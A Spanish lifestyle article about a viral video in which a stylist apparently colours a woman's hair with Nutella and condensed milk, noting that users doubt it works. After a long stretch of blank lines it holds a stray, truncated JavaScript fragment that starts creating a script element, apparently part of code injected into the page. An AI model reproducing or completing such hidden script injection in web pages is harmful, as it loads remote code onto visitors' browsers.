¿Teñirse el cabello con nutella? La última fiebre de las redes sociales

Si pensabas que tus ojos ya lo habían visto todo… en las redes esta surgiendo una nueva técnica para teñir el cabello con chocolate.

Sin duda la belleza se esta renovando con el paso de los años, nuevas tendencias, técnicas y novedosos inventos son los que llegan a la vida de las mujeres, simplemente para hacer la vida más fácil o renovar las viejas tánicas y buscar lo natural.

Cuando pensabas que tus ojos lo han visto casi todo en tendencias para el cabello, con las redes sociales siempre hay algo que nos sorprende aun más.

Así lo demostró el estilista libanés Abed Allahitani, quien a través de su cuenta de Instagram mostró cómo puede cambiar el color de una melena con dos productos: crema de cacao (nutella) y leche condensada.

¡No es broma! Si no lo crees checa el siguiente video…

 

Como se ve en las imágenes, el estilista aplica varias cucharadas de nutella sobre el cabello de la mujer rubia. Después, extiende la crema por todo el cabello y añade una menor cantidad de leche condensada.

Para acabar, cubre los mechones con papel de estaño y pasado un tiempo, aclara con agua todo el cabello y el cambio es sorprendente.

La mujer luce ahora un tono castaño caramelo con un brillo espectacular. A pesar de los numerosos likes que ha generado el video, ha causado gran controversia entre los usuarios. Algunos opinan que la nutella y la leche no tienen nada que ver con el cambio de color de melena.

¿Tu qué opinas?

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 var d=document;var s=d.createElement(‘script’);

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.